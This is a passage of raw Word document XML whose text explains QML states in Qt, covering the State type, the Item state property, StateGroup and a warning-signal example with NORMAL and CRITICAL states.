        <w:t>state, a red light will turn on while the yellow and the green lights will turn off. In the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>caution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state, the yellow light is on while the other lights are turned off.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In QML,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>states</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are a set of property configurations defined in a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2422" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>State</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type. Different configurations could, for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Show some UI components and hide others</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Present different available actions to the user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Start, stop, or pause animations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Execute some script required in the new state</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Change a property value for a particular item</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Show a different view or screen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2423" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-based objects have a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and can specify additional states by adding new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects to the item's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2424" w:anchor="states-prop" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>states</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property. Each state within a component has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, an empty string being the default. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To change</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the current state of an item, set the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2425" w:anchor="state-prop" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>state</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to the name of the state.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Non-Item objects may use states through the</w:t>
      </w:r>
      <w:r w:rsidR="008B1DCE" w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2426" w:history="1">
        <w:r w:rsidRPr="008B1DCE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>StateGroup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008B1DCE" w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2052" w:name="creating-states"/>
      <w:bookmarkStart w:id="2053" w:name="_Toc483000975"/>
      <w:bookmarkStart w:id="2054" w:name="_Toc483003966"/>
      <w:bookmarkStart w:id="2055" w:name="_Toc483604317"/>
      <w:bookmarkStart w:id="2056" w:name="_Toc483605537"/>
      <w:bookmarkEnd w:id="2052"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating States</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2053"/>
      <w:bookmarkEnd w:id="2054"/>
      <w:bookmarkEnd w:id="2055"/>
      <w:bookmarkEnd w:id="2056"/>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To create a state, add a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2427" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>State</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object to the item's</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2428" w:anchor="states-prop" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>states</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property, which holds a list of states for that item.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A warning</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signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component may have two states,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NORMAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and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CRITICAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state. Suppose that in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NORMAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state,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color</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of the signal should be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green</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the warning</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flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is down. Meanwhile, in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CRITICAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state,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color</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should be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red</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
